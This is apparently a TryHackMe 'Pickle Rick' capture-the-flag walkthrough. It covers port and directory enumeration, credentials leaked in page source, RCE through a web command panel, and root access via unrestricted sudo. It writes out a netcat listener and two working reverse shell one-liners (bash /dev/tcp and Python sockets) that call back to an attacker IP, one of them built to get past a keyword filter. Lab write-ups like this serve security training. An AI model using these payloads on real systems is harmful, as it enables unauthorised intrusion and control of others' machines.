Pickle Rick

This is the first machine in TryHackMe's "Starters" series: https://tryhackme.com/r/hacktivities/practice

I'll start with a quick preliminary nmap scan of the common ports: nmap -T4 10.10.215.148

Nmap scan report for 10.10.215.148
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

We find that among the common ports, we just have SSH and HTTP open. I'll start another scan to hopefully get more detail about these services: nmap -T4 -sV -sC 10.10.215.148 -p22,80

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e1:e7:f9:c9:9d:4e:cd:e6:2d:1f:94:3c:7a:ce:27:02 (RSA)
|   256 dd:23:19:fe:f7:50:0b:55:92:71:b0:01:da:b2:54:b6 (ECDSA)
|_  256 04:ff:75:6d:7a:0c:be:f4:e2:a5:85:16:34:99:a8:43 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.08 seconds

Checking out the website, I'll run a gobuster scan to find sub-directories: gobuster dir -u http://10.10.215.148:80 --wordlist /usr/share/wordlists/dirb/common.txt

Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/assets               (Status: 301) [Size: 315] [--> http://10.10.215.148/assets/]                                                          
/index.html           (Status: 200) [Size: 1062]
/robots.txt           (Status: 200) [Size: 17]
/server-status        (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

We'll start exploring the pages found from this scan:

Opening to index.html, we're greeted with this page: Image of index.html From this, it sounds like our main objective is to login to the server via SSH. In this page's source, we find the following comment:

  <!--

    Note to self, remember username!

    Username: R1ckRul3s

  -->

Attempting to login, we receive "Permission denied (publickey)" meaning we'll need an SSH key to login with this username. Same when attempting to login as root.

/robots.txt only contains the string "Wubbalubbadubdub", which is either meaningless or a potential password.

In /assets, we have several files available. Some of them are images, so we'll take a quick look with steghide, but couldn't find any further information.

We seem to have potential login credentials, but we don't have anywhere to use them.

Now running a more exhaustive gobuster scan with /usr/share/wordlists/dibuster/directory-list-2.3-small.txt, as well as another Nmap enumeration of HTTP: gobuster dir -u http://10.10.215.148:80 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt nmap --script http* 10.10.215.148 -p80

In the meantime, I continued to search manually for other pages that might be present indicated by the images in assets. One of them, portal.jpg, led to finding /portal.php which redirects to /login.php: Image of portal login page

This time we don't have any useful information in the page's source, but we are able to log in to this page using R1ckRul3s:Wubbalubbadubdub.

Upon logging in, we have a "Command Panel" which gives us direct RCE into the webroot (/var/www/html) as the user www-data. Image showing RCE through portal

All of the other tabs visible at the top of this page deny access: Image showing other tabs in portal as forbidden

We'll navigate back to /portal.php obtain a Bash reverse shell for easier enumeration: Open a listener on the attacking machine: rlwrap nc -lnvp 53 Connect to the listener from the target machine via the command panel: sh -i >& /dev/tcp/10.13.55.228/53 0>&1

After a few unsuccessful attempts, I'm given this screen, indicating that there's some form of filtering that prevents us from executing these commands, including nc and cat:

Image showing keyword filtering for the command portal

I made some more attempts, eventually succeeding with the following Python3 command to establish the reverse shell: export RHOST="10.13.55.228";export RPORT=53;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

Then we'll use our Python trick to upgrade to an interactive TTY: python3 -c 'import pty;pty.spawn("/bin/bash")'.

At this point, we find that we're able to read /home/rick/'second ingredients', which gives us the second flag.

Next, assuming we're going to somehow escalate privileges to find the final flag, I notice that using sudo, we can run any command as root:

www-data@ip-10-10-51-251:/$ sudo -l
Matching Defaults entries for www-data on ip-10-10-51-251:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ip-10-10-51-251:
    (ALL) NOPASSWD: ALL
www-data@ip-10-10-51-251:/$ sudo whoami
root

Now using sudo, we can find that the 3rd and final flag is located in /root/3rd.txt, and cat its contents to finish the room!